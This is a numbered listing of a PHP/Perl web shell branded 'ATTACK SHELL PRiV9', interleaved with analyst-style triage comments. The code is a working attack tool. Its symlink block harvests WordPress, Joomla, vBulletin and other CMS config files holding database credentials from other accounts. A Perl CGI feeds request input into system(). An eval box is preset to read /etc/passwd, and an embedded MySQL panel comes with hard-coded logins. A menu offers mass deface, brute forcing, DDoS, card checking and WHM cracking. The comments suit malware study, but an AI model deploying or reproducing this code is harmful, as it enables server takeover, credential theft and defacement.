  172. symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$kola.'- wordpress - blogs.txt');
  173. symlink('/home/'.$user.'/public_html/home/wp-config.php',$kola.'- wordpress - home.txt');
  174. symlink('/home/'.$user.'/public_html/protal/wp-config.php',$kola.'- wordpress - protal.txt');
  175. symlink('/home/'.$user.'/public_html/site/wp-config.php',$kola.'- wordpress - site.txt');
  176. symlink('/home/'.$user.'/public_html/main/wp-config.php',$kola.'- wordpress - main.txt');
  177. symlink('/home/'.$user.'/public_html/test/wp-config.php',$kola.'- wordpress - test.txt');
  178. symlink('/home/'.$user.'/public_html/joomla/configuration.php',$kola.'-joomla - joomla .txt');
  179. symlink('/home/'.$user.'/public_html/protal/configuration.php',$kola.'- joomla - protal.txt');
  180. symlink('/home/'.$user.'/public_html/joo/configuration.php',$kola.'- joomla - joo.txt');
  181. symlink('/home/'.$user.'/public_html/cms/configuration.php',$kola.'- joomla - cms.txt');
  182. symlink('/home/'.$user.'/public_html/site/configuration.php',$kola.'- joomla - site.txt');
  183. symlink('/home/'.$user.'/public_html/main/configuration.php',$kola.'- joomla - main.txt');
  184. symlink('/home/'.$user.'/public_html/news/configuration.php',$kola.'- joomla - news.txt');
  185. symlink('/home/'.$user.'/public_html/new/configuration.php',$kola.'- joomla - new.txt');
  186. symlink('/home/'.$user.'/public_html/home/configuration.php',$kola.'- joomla - home.txt');
  187. symlink('/home/'.$user.'/public_html/vb/includes/config.php',$kola.'- vb.txt');
  188. symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$kola.'- vb3.txt');
  189. symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$kola.'-cpanel.txt');
  190. symlink('/home/'.$user.'/public_html/panel/configuration.php',$kola.'-panel.txt');
  191. symlink('/home/'.$user.'/public_html/host/configuration.php',$kola.'-host.txt');
  192. symlink('/home/'.$user.'/public_html/hosting/configuration.php',$kola.'-hosting.txt');
  193. symlink('/home/'.$user.'/public_html/hosts/configuration.php',$kola.'-hosts.txt');
  194. symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$kola.'-zencart.txt');
  195. symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$kola.'- zencart - shop.txt');
  196. symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$kola.'-shop-ZCshop.txt');
  197. symlink('/home/'.$user.'/public_html/Settings.php',$kola.'- smf.txt');
  198. symlink('/home/'.$user.'/public_html/smf/Settings.php',$kola.'- smf - smf.txt');
  199. symlink('/home/'.$user.'/public_html/forum/Settings.php',$kola.'- smf - forum.txt');
  200. symlink('/home/'.$user.'/public_html/forums/Settings.php',$kola.'- smf - forums.txt');
  201. symlink('/home/'.$user.'/public_html/upload/includes/config.php',$kola.'- upload .txt');
  202. symlink('/home/'.$user.'/public_html/incl/config.php',$kola.'- malay.txt');
  203. symlink('/home/'.$user.'/public_html/config/koneksi.php',$kola.'- lokomedia.txt');
  204. symlink('/home/'.$user.'/system/sistem.php',$kola.'- lokomedia.txt');
  205. }
  206. if ($ENV{'REQUEST_METHOD'} eq 'POST') {
  207.  read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'});
  208. } else {
  209.  $buffer = $ENV{'QUERY_STRING'};
  210. }
  211. @pairs = split(/&/, $buffer);
  212. foreach $pair (@pairs) {
  213.  ($name, $value) = split(/=/, $pair);
  214.  $name =~ tr/+/ /;
  215.  $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  216.  $value =~ tr/+/ /;
  217.  $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  218.  $FORM{$name} = $value;
  219. }
  220. if ($FORM{pass} eq ""){
       # Analyst note: when no "pass" field was submitted, only the input form is
       # printed: a textarea named pass and a text field named tar, posted back
       # to the same script.
  221. print '
  222. <body class="newStyle1">
  223. <p>&nbsp;</p>
  224. <form method="post">
  225. <textarea name="pass" style="width: 543px; height: 400px"></textarea>
  226. <br /><br />
  227. <input name="tar" type="text" style="width: 212px" /><br /><br />
  228. <input name="Submit1" type="submit" value="Hajar ..!" style="width: 99px" />
  229. <br />
  230. </form>';
  231. }else{
       # Angle brackets around a hash element are parsed by Perl as glob(), not as
       # readline, so the submitted text is split on whitespace into @lines.
  232. @lines =<$FORM{pass}>;
  233. $y = @lines;
       # A file named tar.tmp is opened for writing in the current directory and
       # receives a single tar command line. The tar form field is concatenated
       # into that command line without any validation.
  234. open (MYFILE, ">tar.tmp");
  235. print MYFILE "tar -czf ".$FORM{tar}.".tar ";
  236. for ($ka=0;$ka<$y;$ka++){
       # Every token is matched against the passwd-style pattern "name:x:". The
       # captured name is passed to lil() and then name.txt plus name1.txt up to
       # name17.txt are appended to the tar argument list.
       # NOTE(review): lil() is not defined in this part of the listing; the
       # symlink() block that ends just above is presumably its body - confirm.
  237. while(@lines[$ka]  =~ m/(.*?):x:/g){
  238. &lil($1);
  239. print MYFILE $1.".txt ";
  240. for($kd=1;$kd<18;$kd++){
  241. print MYFILE $1.$kd.".txt ";
  242. }
  243. }
  244. }
  245. print'<body class="newStyle1">
  246. <p>Done !!</p>
  247. <p>&nbsp;</p>';
  248. if($FORM{tar} ne ""){
       # The content of tar.tmp is read back and passed to system(), so text that
       # came from the request reaches command execution. The tar field is also
       # echoed unescaped into the download link below.
       # Artefacts for triage, all taken from this block: tar.tmp and an archive
       # named after the tar field with a .tar suffix, in the script directory.
  249. open(INFO, "tar.tmp");
  250. @lines =<INFO> ;
  251. close(INFO);
  252. system(@lines);
  253. print'<p><a href="'.$FORM{tar}.'.tar"> download  file</a></p>';
  254. }
  255. }
  256. print"
  257. </body>
  258. </html>";'; ?>
  259. <html><head><link href='hxxp://www.iwallhd.com/stock/lion-black-background-free-wallpapers.jpg' rel='icon' type='image/gif'><script language='JavaScript'>
  260. var txt="ATTACK SHELL PRiV9 ";
       // Analyst note: title marquee. bergerak() writes txt to document.title,
       // rotates the string left by one character and re-schedules itself every
       // kecepatan (120) milliseconds. setTimeout is given a string, which the
       // browser evaluates as code. The fixed title text is a stable fingerprint
       // of this panel in served page content.
  261. var kecepatan=120;var segarkan=null;function bergerak() { document.title=txt;
  262. txt=txt.substring(1,txt.length)+txt.charAt(0);
  263. segarkan=setTimeout("bergerak()",kecepatan);}bergerak();
  264. </script>
  265. <link href='hxxp://fonts.googleapis.com/css?family=Roboto:400,300,400italic,500,700%7CRopa+Sans%7COswald' rel='stylesheet' type='text/css'/>
  266. <script type="text/javascript">
  267. function tukar(lama,baru){
           // Swaps two panels: hides the element whose id is lama and shows the
           // element whose id is baru. Neither lookup is checked, so a missing id
           // makes getElementById return null and the assignment throw.
  268.     document.getElementById(lama).style.display = 'none';
  269.     document.getElementById(baru).style.display = 'block';
  270. }
  271. </script>
  272. <style type="text/css">
  273. body{
  274.     background:#000000;;
  275. }
  276. a {
  277. text-decoration:none;
  278. }
  279. a:hover{
  280. border-bottom:1px solid #FF0000;
  281. }
  282. *{
  283.     font-size:11px;
  284.     font-family:Tahoma,Verdana,Arial;
  285.     color:#FFFFFF;
  286. }
  287. #menu{
  288.     background:none;
  289.     margin:8px 2px 4px 2px;
  290. }
  291. .menu a{
  292. background-color:#CCFF00;
  293.   display:inline-block;
  294.   position:relative;
  295.   margin:30px 5px;
  296.   border:1px solid #FFFFFF;
  297.   padding:20px 20px 20px 80px;
  298.   color:#fff;
  299.   transition:all 0.4s ease
  300. }
  301.  
  302. .menu a:hover{
  303.   background:#2c3e50
  304. }
  305. .tabnet{
  306.     margin:15px auto 0 auto;
  307.     border: 1px solid #CCCC00;
  308. }
  309. .main {
  310.     width:100%;
  311.         box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
  312. }
  313. .gaya {
  314.     color: #FF0000;
  315. }
  316. .inputz{
  317.     background:#000000;
  318.     border:0;
  319.     padding:2px;
  320.     border-bottom:1px solid #FFFFFF;
  321.     border-top:1px solid #FFFFFF;
  322. }
  323. .inputzbut{
  324.     background:#000000;
  325.     color:#FFFFFF;
  326.     margin:0 4px;
  327.     border:2px solid #000000;
  328.  
  329. }
  330. .inputz:hover,{
  331.     border-bottom:1px solid #FF0000;
  332.     border-top:1px solid #FF0000;
  333. }
  334. .inputzbut:hover{
  335. border:2px solid #FFFFFF;
  336. }
  337. .output {
  338.     margin:auto;
  339.     border:1px solid #FF0000;
  340.     width:100%;
  341.     height:400px;
  342.     background:#000000;
  343.     padding:0 2px;
  344. }
  345. .cmdbox{
  346.     width:100%;
  347. }
  348. .head_info{
  349.     padding: 0 4px;
  350. }
  351. .jaya{ font-family: ;}
  352.  
  353. .coli{
  354.     font-size:30px;
  355.     padding:0;
  356.     color:#000000;
  357. }
  358. .coli_tbl{
  359.     text-align:center;
  360.     margin:0 4px 0 0;
  361.     padding:0 4px 0 0;
  362.     border-right:2px solid #FFFFFF;
  363. }
  364. .phpinfo table{
  365.     width:100%;
  366.     padding:0 0 0 0;
  367. }
  368. .phpinfo td{
  369.     background:#000000;
  370.     color:#000000;
  371. padding:6px 8px;;
  372. }
  373. .phpinfo th, th{
  374.     background:#000000;
  375.     border-bottom:1px solid #CCCC00;
  376. font-weight:normal;
  377. }
  378. .phpinfo h2, .phpinfo h2 a{
  379.     text-align:center;
  380.     font-size:16px;
  381.     padding:0;
  382.     margin:30px 0 0 0;
  383.     background:#CCCC00;
  384.     padding:4px 0;
  385. }
  386. .explore{
  387. width:100%;
  388. }
  389. .explore a {
  390. text-decoration:none;
  391. }
  392. .explore td{
  393. border-bottom:2px solid #FFFFFF;
  394. padding:0 8px;
  395. line-height:24px;
  396. }
  397. .explore th{
  398. padding:3px 8px;
  399. font-weight:normal;
  400. background:#000000;
  401. border-bottom:2px solid #FFFFFF;
  402. }
  403. .explore th:hover , .phpinfo th:hover{
  404. border-bottom:1px solid #FF0000;
  405. }
  406. .explore tr:hover{
  407. background:#000000;
  408. }
  409. .viewfile{
  410. background:#000000;
  411. color:#000000;
  412. margin:4px 2px;
  413. padding:8px;
  414. }
  415. .sembunyi{
  416. display:none;
  417. padding:0;margin:0;
  418. }
  419. .btn {
  420. background:#000000;
  421. width:auto;
  422. height:auto;
  423. padding:5px;
  424. border:2px #FFFFFF solid;
  425. font-family:"oswald";
  426. font-size:14px;
  427. color:#FFFFFF;
  428. text-align:center;
  429. text-decoration:none;
  430. text-transform:uppercase;
  431. }
  432. .btn:hover {
  433. background:#FFFFFF;
  434. width:auto;
  435. height:auto;
  436. padding:5px;
  437. margin:0px;
  438. border:2px #000000 solid;
  439. font-family:"oswald";
  440. font-size:14px;
  441. color:#000000;
  442. text-align:center;
  443. text-decoration:none;
  444. text-transform:uppercase;
  445. }
  446. body {
  447. background:#FFFFFF;
  448. background:url("hxxp://www.iwallhd.com/stock/lion-black-background-free-wallpapers.jpg");
  449. }
  450. .header {
  451. background:#000000;
  452. width:100%;
  453. height:auto;
  454. poisition:static;top:0px;
  455. font-family:"Oswald";
  456. font-size:16px;
  457. color:#FFFFFF;
  458. border-bottom:2px solid #FFFFFF;
  459. padding-bottom:20px;
  460. box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
  461. }
  462. /* Vn Navigasi
  463. -------------------------*/
  464. .vn-nav{
  465.   background:#000000;
  466.   width:auto;
  467.   padding-top:15px;
  468.   padding-bottom:15px;
  469.   font-size:14px;
  470.   padding-left:20px;
  471.   border-bottom: #000000 3px solid;
  472. }
  473.  
  474. .vn-nav ul { margin: 0; padding: 0; list-style-type: none; list-style-image: none; }
  475.  
  476. .vn-nav li { margin-right: 0px; display: inline; }
  477.  
  478. .vn-nav ul li a { text-decoration:none;  margin: 0px; padding: 15px 20px 15px 20px; color:#ffffff; }
  479.  
  480. .vn-nav li.current-menu-item a{ color: #fff; text-decoration:none; background-color:#000000; }
  481.  
  482. .vn-nav li.current_page_item  { color: #fff; text-decoration:none; background-color:#000000; }
  483.  
  484. /* Vn Simple Modal
  485. -------------------------*/
  486. .modalDialog {
  487.     position: fixed;
  488.     font-family: Arial, Helvetica, sans-serif;
  489.     top: 0;
  490.     right: 0;
  491.     bottom: 0;
  492.     left: 0;
  493.     background: rgba(0,0,0,0.8);
  494.     z-index: 99999;
  495.     opacity:0;
  496.     -webkit-transition: opacity 400ms ease-in;
  497.     -moz-transition: opacity 400ms ease-in;
  498.     transition: opacity 400ms ease-in;
  499.     pointer-events: none;
  500. }
  501.  
  502. .modalDialog:target {
  503.     opacity:1;
  504.     pointer-events: auto;
  505. }
  506.  
  507. .modalDialog > div {
  508.     width: 500px;height:auto;
  509.     position: relative;
  510.     margin: 5% auto;
  511.     padding: 5px 20px 13px 20px;
  512.     background: #34495e;color:#fff;
  513. }
  514.  
  515. .close {
  516.     background: #2c3e50;
  517.     color: #000000;padding:5px;border-radius:0 0 12px 0;
  518.     line-height: 16px;
  519.     position: absolute;
  520.     right: -55px;
  521.     text-align: center;
  522.     top: 0;
  523.     width: 16px;
  524.     text-decoration: none;
  525.     font-weight: bold;
  526. }
  527.  
  528. .close:hover { background: #2c3e50;color:#e74c3c }
  529.  
  530. /* Vn Button
  531. -------------------------*/
  532.  
  533. .vn-green a{
  534. background-color:#CCFF00;
  535.   display:inline-block;
  536.   position:relative;
  537.   margin:30px 5px;
  538.   border:1px solid #FFFFFF;
  539.   padding:20px 20px 20px 80px;
  540.   color:#fff;
  541.   transition:all 0.4s ease
  542. }
  543.  
  544. .vn-green a:hover{
  545.   background:#2c3e50
  546. }
  547. .content{
  548. background:#2E2A2A;
  549. width:100%;
  550. height:auto;
  551. padding-bottom:10px;
  552. box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
  553. }
  554. .footer{
  555. background:#000000;
  556. width:100%;
  557. height:auto;
  558. position:static;bottom:0px;
  559. padding-top:15px;
  560. padding-bottom:15px;
  561. font-family:"Oswald";
  562. font-size:10px;
  563. color:#FFFFFF;
  564. text-align:center;
  565. text-transform:uppercase;
  566. box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
  567. }
  568. .footer:a link{
  569. font-family:"Oswald";
  570. }
  571. .cr {
  572. background:none;
  573. float:right;
  574. padding-right:15px;
  575. padding-top:20px;
  576. font-family:"Oswald";
  577. font-size:24px;
  578. color:#FFFFFF;
  579. text-transform:uppercase;
  580. }
  581. .cr:hover {
  582. background:none;
  583. float:right;
  584. padding-right:15px;
  585. padding-top:20px;
  586. font-family:"Oswald";
  587. font-size:24px;
  588. color:#000000;
  589. text-transform:uppercase;
  590. }
  591. .menu-wrap{
  592. background:#000000;
  593. width:100%;
  594. height:auto;
  595. padding-bottom:10px;
  596. box-shadow: inset 0 -1px 0 rgba(48, 48, 48, 0.7), 0 2px 4px rgba(48, 48, 48, 0.7);
  597. }
  598. </style>
  599. </head>
  600.  
  601.  
  602. <body onLoad="document.getElementById('cmd').focus();">
  603. <div class="main">
  604. <div class="vn-nav">
  605. <ul>
  606.   <li><a href="#openModal">About</a>
  607.  
  608. <div id="openModal" class="modalDialog">
  609.     <div>
  610.         <a href="#close" title="Close" class="close">X</a>
  611.                 <center><p><img src="hxxp://i.hizliresim.com/z4lrbR.png" width="350px" height="290px"/><br/>egyshell team are a Network Security and YouTube Vloger.<br/><br/>hacking is the art of creative problem resolving<br/></p>
  612. <div class="vn-green" style="text-align: center;"><a href="hxxps://www.facebook.com/r00t.info/" target="_blank">r00t.info</a> | <a href="hxxp://r00t.info" target="_blank">site</a> | <a href="hxxps://www.facebook.com/r00t.info/" target="_blank">Attack shell priv8</a></div></center>
  613. </div>
  614. </div></li>
  615. </ul>
  616. <div class="cr">lacked by r00t.info</div>
  617. </div>
  618. <div class="header">
  619. <div class="head_info">
  620. <table ><tr>
  621. <td><table class="coli_tbl"><tr><td><a href="?"><span class="coli"><img src="hxxp://i.hizliresim.com/z4lrbR.png" width="225" heigth="155" /></span></a></td></tr><tr><td><b></b></td></tr></table></td>
  622. <td><?php echo $buff; ?></td>
  623. </tr></table>
  624. </div>
  625. </div>
  626. <div class="menu-wrap">
  627. <div class="vn-nav">Menu</div><br/>
  628. <!-- menu start -->
  629. <center><div id="menu">
  630. <a class="btn" href="?<?php echo "y=".$pwd; ?>">Home</a>
  631. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=shell">Shell</a>
  632. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=php">Eval</a>
  633. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=sql">Mysql</a>
  634. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=dump">Database Dump</a>
  635. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">Php Info</a>
  636. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">Net Sploit</a>
  637. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=upload">Upload</a>
  638. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=mail">E-Mail</a>
  639. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=sqli-scanner">SQLI Scan</a>
  640. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=port-sc">Port Scan</a>
  641. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=dos">DDos</a>
  642. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=tool">Tools</a>
  643. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=domain">Domain</a>
  644. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=python">python</a>
  645. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=symlink">Symlink</a>
  646. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=config">Config</a>
  647. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=bypass">Bypass</a><br/><br/>
  648. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=cgi">CgiShell</a>
  649. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=cgi2012">CGI Telnet 2012</a>
  650. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=jodexer">Joomla IndChange</a>
  651. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=vb">VB IndChange</a>
  652. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=wp-reset">Wordpress ResPass</a>
  653. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=jm-reset">Joomla ResPass</a>
  654. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=whmcs">WHMCS Decoder</a>
  655. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=zone">Zone-H</a>
  656. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=mass">Mass Deface</a>
  657. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=wpbrute">Wordpress BruteForce</a><br/><br/>
  658. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=jbrute">Joomla BruteForce</a>
  659. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=brute">Cpanel BruteForce</a>
  660. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=bypass-cf">Bypass CloudFlare</a>
  661. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=adfin">Admin Finder</a>
  662. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=hash">Password Hash</a>
  663. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=hashid">Hash ID</a>
  664. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=string">Script Encode</a>
  665. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=ccv">CC Tester</a>
  666. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=whois">Website Whois</a>
  667. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=music">Musicfiles</a><br/><br/>
  668. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=jss">Joomla Server Scanner</a>
  669. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=cms_detect">Cms Detector</a>
  670. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=color">Color Tools</a>
  671. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=telin">Speedtest</a>
  672. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=idfinder">Facebook ID Finder</a>
  673. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=schoolhos">Schoolhos</a>
  674. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=whmcr">WHM Cracker</a>
  675. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=rd">Root Devil Scanner</a>
  676. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=dork">Dork List</a><br/><br/>
  677. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=ppcheck">Paypal Checker</a>
  678. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=jce">JCE Exploiter</a>
  679. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=comuser">Com_user Scanner</a>
  680. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=configkiller">Config File Killer</a>
  681. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=spoison">Silent Poison</a>
  682. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=mailbomb">Bomb Mailer</a>
  683. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=whmcsploit">WHMCS Exloiter</a>
  684. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=ascii">ASCII Encoder</a><br/><br/>
  685. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=apache">Apache</a>
  686. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=hostgator">Hostgator</a>
  687. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=bluehost">Bluehost</a>
  688. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=litespeed">Litespeed</a>
  689. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=ovh">OVH</a>
  690. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=forbidden">Forbidden</a>
  691. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=phpnuke">PHP Nuke</a>
  692. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=whmtool">WHMCS Tools</a>
  693. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=unzip">Unzip</a>
  694. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=systemview">View System</a>
  695. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=traintup">Traintup</a><br/><br/>
  696. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=mysqlback">Mysql Backup</a>
  697. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=bind">Bindconnect</a>
  698. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=security">Security</a>
  699. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=shellscan">Shell Scanner</a>
  700. <a class="btn" href="?<?php echo $self.'gdork'?>">Dork Creator</a>
  701. <a class="btn" href="<?php echo $self.'?obfuscate'?>">Obfuscator</a>
  702. <a class="btn" href="?<?php echo "y=".$pwd; ?>&amp;x=logout">Log-Out</a><br/><br/>
  703.  
  704.  
  705. </div></center>
  706. <!-- menu end -->
  707. </div>
  708. <div class="content">
  709. <div class="vn-nav">Explore Like a Boss</div>
  710. <?php @ini_set('display_errors', 0); if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?>
  711. <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  712. <table class="cmdbox">
  713. <tr><td>
  714. <textarea class="output" name="cmd" id="cmd">
  715. <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');"; ?>
  716. </textarea>
  717. <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form>
  718. </table>
  719. </form>
  720.  
  721. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'sql')) { ?>
  722. <form action="?y=<?php echo $pwd; ?>&amp;x=sql" method="post">
  723. <?php echo "<center/><br/><b><font color=#FF0000>+--==[ Mysql Interface ]==--+</font></b><br><br>"; mkdir('mysql', 0755); chdir('mysql'); $akses = ".htaccess"; $buka_lah = "$akses"; $buka = fopen ($buka_lah , 'w') or die ("Error cuyy!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  724. AddType application/x-hxxpd-php .cpc
  725. "; fwrite ( $buka , $metin ) ; fclose ($buka); $sqlshell = '<?
  726. $PASSWORD = "root_xhahax";
       // Analyst note: hard-coded credential pair at the top of the embedded MySQL
       // panel. Neither variable is referenced in the visible part of the payload.
       // Both literals are static strings and therefore usable for content
       // signatures.
  727. $USERNAME = "xhahax";
       // Reads the register_globals setting, through ini_get() when available and
       // get_cfg_var() otherwise.
  728. if ( function_exists('ini_get') ) {
  729.     $onoff = ini_get('register_globals');
  730. } else {
  731.     $onoff = get_cfg_var('register_globals');
  732. }
       // When register_globals is not 1, the request arrays are imported into the
       // global scope with extract(). EXTR_SKIP keeps a variable that already
       // exists, so the first array that supplies a name wins. The functions below
       // read $dbname, $tablename, $queryStr and similar names as globals, so
       // those values are presumably request-controlled.
       // NOTE(review): the hxxp_ prefix looks like a defanging artefact of the
       // paste (HTTP rewritten to hxxp); the legacy PHP arrays are named
       // HTTP_SERVER_VARS, HTTP_GET_VARS and so on - confirm against a raw sample.
  733. if ($onoff != 1) {
  734.     @extract($hxxp_SERVER_VARS, EXTR_SKIP);
  735.     @extract($hxxp_COOKIE_VARS, EXTR_SKIP);
  736.     @extract($hxxp_POST_FILES, EXTR_SKIP);
  737.     @extract($hxxp_POST_VARS, EXTR_SKIP);
  738.     @extract($hxxp_GET_VARS, EXTR_SKIP);
  739.     @extract($hxxp_ENV_VARS, EXTR_SKIP);
  740. }
  741.  
  742. function logon() {
           // Analyst note: login screen of the embedded MySQL panel.
           // The three setcookie() calls pass no value, which asks the browser to
           // delete any stored mysql_web_admin_* cookie.
           // The form has no method attribute, so the browser submits hostname,
           // username and password as GET parameters together with
           // action=bG9nb25fc3VibWl0 (base64 of logon_submit). Requests carrying
           // that action value, and database credentials in the query string, are
           // what to look for in web server access logs.
  743.     global $PHP_SELF;
  744.     setcookie( "mysql_web_admin_username" );
  745.     setcookie( "mysql_web_admin_password" );
  746.     setcookie( "mysql_web_admin_hostname" );
  747.     echo "<table width=100% height=100%><tr><td><center>\n";
  748.     echo "<table cellpadding=2><tr><td><center>\n";
  749.     echo "<table cellpadding=20><tr><td><center>\n";
  750.     echo "<h1>MySQL Interface By S4MP4H</h1>\n";
  751.     echo "<form action='$PHP_SELF'>\n";
  752.     echo "<input type=hidden name=action value=bG9nb25fc3VibWl0>\n";
  753.     echo "<table cellpadding=5 cellspacing=1>\n";
  754.     echo "<tr><td class=\"new\">Hostname </td><td> <input type=text name=hostname value='localhost'></td></tr>\n";
  755.     echo "<tr><td class=\"new\">Username </td><td> <input type=text name=username></td></tr>\n";
  756.     echo "<tr><td class=\"new\">Password </td><td> <input type=password name=password></td></tr>\n";
  757.     echo "</table><p>\n";
  758.     echo "<input type=submit value='Enter'>\n";
  759.     echo "<input type=reset value='Clear'><br>\n";
  760.     echo "</form>\n";
  761.     echo "</center></td></tr></table>\n";
  762.     echo "</center></td></tr></table>\n";
  763.     echo "<p><hr width=300>\n";
  764.     echo "</center></td></tr></table>\n";
  765. }
  766.  
  767. function logon_submit() {
           // Analyst note: stores the submitted database hostname, username and
           // password in three cookies. The values are written as received, with
           // no encryption and no Secure or HttpOnly flag, so the database
           // password travels in every later request to the panel.
           // An empty hostname falls back to localhost. The meta refresh then
           // redirects to action=bGlzdERCcw== (base64 of listDBs).
           // $username, $password and $hostname are globals here; presumably they
           // are populated from the request by the extract() calls at the top of
           // the payload.
  768.     global $username, $password, $hostname ,$PHP_SELF;
  769.     if($hostname =='')
  770.         $hostname = 'localhost';
  771.     setcookie( "mysql_web_admin_username", $username );
  772.     setcookie( "mysql_web_admin_password", $password );
  773.     setcookie( "mysql_web_admin_hostname", $hostname );
  774.     echo "<META hxxp-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=bGlzdERCcw=='>";
  775. }
  776.  
  777. function echoQueryResult() {
           // Prints the last SQL statement and its outcome as a two-row table.
           // An empty $errMsg is replaced by the text Success; nothing is printed
           // when $queryStr is empty. Both globals are written into the page
           // without HTML escaping.
  778.     global $queryStr, $errMsg;
  779.     if( $errMsg == "" ) $errMsg = "Success";
  780.     if( $queryStr != "" ) {
  781.         echo "<table cellpadding=5>\n";
  782.         echo "<tr><td>Query</td><td>$queryStr</td></tr>\n";
  783.         echo "<tr><td>Result</td><td>$errMsg</td></tr>\n";
  784.         echo "</table><p>\n";
  785.     }
  786. }
  787.  
  788. function listDatabases() {
           // Analyst note: lists every database visible to the connection held in
           // $mysqlHandle and prints a create form plus per-database links for
           // the actions listTables, dropDB and dumpDB.
           // mysql_list_dbs(), mysql_num_rows() and mysql_dbname() belong to the
           // legacy mysql extension, which was removed in PHP 7.0, so this panel
           // only works on older interpreters.
           // Database names are written into HTML and URLs without escaping, and
           // the confirm() prompts are client-side only.
  789.     global $mysqlHandle, $PHP_SELF;
  790.     echo "<h1>Databases List</h1>\n";
  791.     echo "<form action='$PHP_SELF'>\n";
  792.     echo "<input type=hidden name=action value=createDB>\n";
